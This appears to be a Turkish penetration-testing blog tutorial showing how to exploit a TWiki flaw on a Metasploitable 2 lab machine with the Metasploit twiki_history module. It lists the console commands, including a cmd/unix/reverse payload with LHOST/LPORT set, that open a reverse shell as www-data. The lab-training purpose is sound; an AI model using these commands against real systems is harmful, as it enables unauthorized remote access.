MSF twiki_history İstismar Modülü ile Uygulama Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

0
8
views
Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda, Metasploitable 2 üzerindeki Twiki‘nin bir bileşenine ait zafiyet tespit edildikten sonra istismar edilecek ve kullanıcı hakları ile Meterpreter bağlantısı elde edilecektir.

IP adresi 100.100.200.7 olan Metasploitable 2’deki zafiyetin istismar işlemi için Metaplosploit Framework içerisindeki twiki_history istismar modülü kullanılabilir.

search twiki
use exploit/unix/webapp/twiki_history
show options

acquiring-meterpreter-shell-on-linux-by-using-msf-twiki-history-exploit-module-01

 

MSF modülüne hedef sistemin IP adresi verilerek istismar işlemi gerçekleştirilebilir. Ancak bazı durumlarda LHOST/LPORT gibi değerlerin ayarlı olarak gelmediği görülebilir. Bu sebeple PAYLOAD verilerek modül seçenekleri incelenebilir.

set RHOST 100.100.200.7
set PAYLOAD cmd/unix/reverse
show options

acquiring-meterpreter-shell-on-linux-by-using-msf-twiki-history-exploit-module-02

 

LHOST ve LPORT değerleri ayarlandıktan sonra istismar işlemi gerçekleştirilir.

set LHOST 100.100.200.4
set LPORT 4456
run
id

acquiring-meterpreter-shell-on-linux-by-using-msf-twiki-history-exploit-module-03

 

Servisi çalıştıran hesap (www-data) yetkileri ile Meterpreter bağlantısı elde edilmiştir.

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz